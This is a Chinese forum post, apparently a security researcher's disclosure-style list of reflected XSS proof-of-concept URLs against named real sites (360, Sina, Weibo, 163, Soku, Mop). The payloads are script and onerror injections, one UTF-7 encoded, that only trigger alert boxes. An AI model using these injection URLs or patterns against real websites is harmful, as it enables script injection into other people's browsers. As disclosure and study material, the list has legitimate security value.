各大网站 XSS 小集合，360，Sina，163，Soku，Mop

Author:qingsh4n

Blog:http://hi.baidu.com/new/qingsh4n

360 xss

漏洞网站：http://dev.app.360.cn

漏洞重现：http://dev.app.360.cn/seriesnum/api?appkey=02a051317dd721459824ecc8e6e77abf&status=1&product_id=Grsm_02&is_real=0&callback=%3Cscript%3Ealert%281%29%3C/script%3E

漏洞证明：

漏洞网站：http://wangzhan.360.cn

漏洞重现：http://wangzhan.360.cn/index.php/abc/abc/abc/%22%3E%3Cscript%3Ealert%28%2fqingsh4n%2f%29%3C%2fscript%3E%2f%2f

漏洞证明：

Sina xss

漏洞网站：http://common.fj.sina.com.cn/

漏洞重现：http://common.fj.sina.com.cn/index.php/201209room/interfaces/vote_entry?callback=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg

漏洞证明：

 

漏洞网站：http://qing.weibo.com/

漏洞重现：http://qing.weibo.com/2389286414/8e699e0e34002bsw.html

漏洞证明：

 

163 xss

漏洞网站：http://blog.163.com

漏洞重现：http://blog.163.com/s/musicWrap.s?n=%B1q%C0Y%A6A%A8%D3&a=%BCB%C5w&t=lrc&event=qingshen&_jsonType=2

漏洞证明：

Soku xss

漏洞网站：http://www.soku.com/

漏洞重现：http://www.soku.com/t/nisearch/%22%3E%3Cimg%20src=1%20onerror=alert(1)%3E///

漏洞证明：

---

0xcodede：

有意思.MOP是我见过XSS最严重最多的。http://hi.mop.com/profile2.do?id=440492071

---

摘自：https://forum.90sec.org/viewthread.php?tid=4012&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000

留言评论（旧系统）：

文章来源于lcx.cc:各大网站 XSS 小集合，360，Sina，163，Soku，Mop